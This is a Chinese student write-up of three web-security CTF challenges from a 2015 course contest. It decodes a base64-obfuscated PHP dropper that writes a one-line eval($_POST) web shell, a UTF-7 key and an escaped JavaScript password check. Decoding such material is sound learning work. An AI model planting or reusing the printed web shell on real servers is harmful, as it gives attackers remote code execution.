2015年南阳理工学院软件学院web安全1

合集下载

1、下载文档前请自行甄别文档内容的完整性，平台不提供额外的编辑、内容补充、找答案等附加服务。
2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
3、如文档侵犯您的权益，请联系客服反馈,我们会尽快为您处理(人工客服工作时间：9:00-18:30)。

本文仅限参考，如有抄袭，复制，切JJ一枚
本文使用繁体编写，如有需要请使用wps文档繁体转换成简体阅读。

WEB安全技術
姓名：***
班級：12級網安一班
學號：1215135068
指導老師：張鑫
2015 3月杯季賽
第二題
題目
:8886/2015-3/2/index.ht ml
查看源碼
 
某年某月某日，菜刀大牛在網路聯盟伺服器上發現了一段奇怪的代碼：
<?fputs(fopen(base64_decode("bm92b2l jZS5waHA="), "w"), base64_d ecode("PD9waHAgQGV2YWwoJF9QT1NUWyd0aGlzX2l zX3lpanVodWEnXSk7Pz4="));?> 據說本題的key就是導出的一句話的密碼

 
<?fputs(fopen(base64_decode("bm92b2ljZS5waHA="), "w"),
base64_decode("PD9waHAgQGV2YWwoJF9QT1NUWyd0aGl zX2lzX3lpanVodWEnXSk7Pz4="));?>,
看到有兩段base64的編碼
bm92b2ljZS5waHA= 這段解碼後是：novoice.php
PD9waHAgQGV2YWwoJF9QT1NUWyd0aGlzX2lzX3lpanVod WEnXSk7Pz4= 這段解碼後是：<?php
@eval($_POST['this_is_yijuhua']);?>
可以看到一句話的密碼就是"this_is_yijuhua".
第三題
內容：
:8886/2015-3/3/index.h tml
UTF-7
編
碼 +AGsAZQB5ADoAaQBhAG0AdQB0AGYANwBlAG4AYwBv AGQAZQBk- .第一次聽到這個編碼，以前聽到最多的就是utf-8了.查了很多資料,
可以知道+和-中間的這段
"AGsAZQB5ADoAaQBhAG0AdQB0AGYANwBlAG4AYwBvAG QAZQBk"是採用修正的base64進行編碼的.
複製這段直接base64解碼就可以知道key.
Key：iamutf7encoded
第四題
內容：
:8886/2015-3/4/index.h tml
查看源碼
(unescape("%66%75%6E%63%74%69%6F%6E%20%43%61
%69%64%61%6F%43%68%65%63%6B%28%29%0D%0A% 7B%0D%0A%20%20%20%20%20%76%61%72%20%4D%79 %50%61%73%73%20%3D%20%64%6F%63%75%6D%65% 6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%42 %79%49%64%28%27%49%6E%63%61%6E%74%61%74%6 9%6F%6E%27%29%2E%76%61%6C%75%65%3B%0D%0A %20%20%20%20%20%69%66%28%22%22%2B%70%61%7 2%73%65%49%6E%74%28%4D%79%50%61%73%73%29% 20%3D%3D%20%4D%79%50%61%73%73%29%0D%0A%2 0%20%20%20%20%7B%0D%0A%20%20%20%20%20%20 %20%20%20%69%66%28%70%61%72%73%65%49%6E%7 4%28%4D%79%50%61%73%73%29%2B%37%39%38%37% 38%39%3D%3D%31%30%30%30%30%30%30%29%0D%0A %20%20%20%20%20%20%20%20%20%7B%0D%0A%20% 20%20%20%20%20%20%20%20%20%20%20%20%61%6C %65%72%74%28%27%u590D%u6D3B%u6210%u529F%uF F01%4B%45%59%u5C31%u662F%u590D%u6D3B%u5492 %u8BED%uFF01%27%29%3B%0D%0A%20%20%20%20% 20%20%20%20%20%7D%65%6C%73%65%7B%0D%0A%2 0%20%20%20%20%20%20%20%20%20%20%20%20%61% 6C%65%72%74%28%27%u590D%u6D3B%u5931%u8D25 %uFF01%u8BF7%u91CD%u65B0%u8F93%u5165%u590D
%u6D3B%u5492%u8BED%27%29%3B%0D%0A%20%20% 20%20%20%20%20%20%20%20%20%20%20%64%6F%63 %75%6D%65%6E%74%2E%47%65%74%5F%4B%65%79% 2E%49%6E%63%61%6E%74%61%74%69%6F%6E%2E%76 %61%6C%75%65%20%3D%20%27%27%3B%0D%0A%20% 20%20%20%20%20%20%20%20%7D%0D%0A%20%20%20 %20%20%7D%65%6C%73%65%7B%0D%0A%20%20%20% 20%20%20%20%20%20%61%6C%65%72%74%28%27%u5 90D%u6D3B%u5931%u8D25%uFF01%u8BF7%u91CD%u6 5B0%u8F93%u5165%u590D%u6D3B%u5492%u8BED%27 %29%3B%0D%0A%20%20%20%20%20%20%20%20%20% 64%6F%63%75%6D%65%6E%74%2E%47%65%74%5F%4B %65%79%2E%49%6E%63%61%6E%74%61%74%69%6F%6 E%2E%76%61%6C%75%65%20%3D%20%27%27%3B%0D %0A%20%20%20%20%20%7D%0D%0A%7D"))
使用unicode解碼之後看到如下一段關鍵代碼：
var MyPass = document.getElementById('Incantation').value; if(""+parseInt(MyPass) == MyPass)
{
if(parseInt(MyPass)+798789==1000000)
{
alert('復活成功！KEY就是復活咒語！');
}else{
alert('復活失敗！請重新輸入復活咒語');
document.Get_Key.Incantation.value = '';
}
}else{
alert('復活失敗！請重新輸入復活咒語');
document.Get_Key.Incantation.value = '';
}
可以計算出MyPass的值為201211，輸入到html，芝麻開門之後就能獲取到key。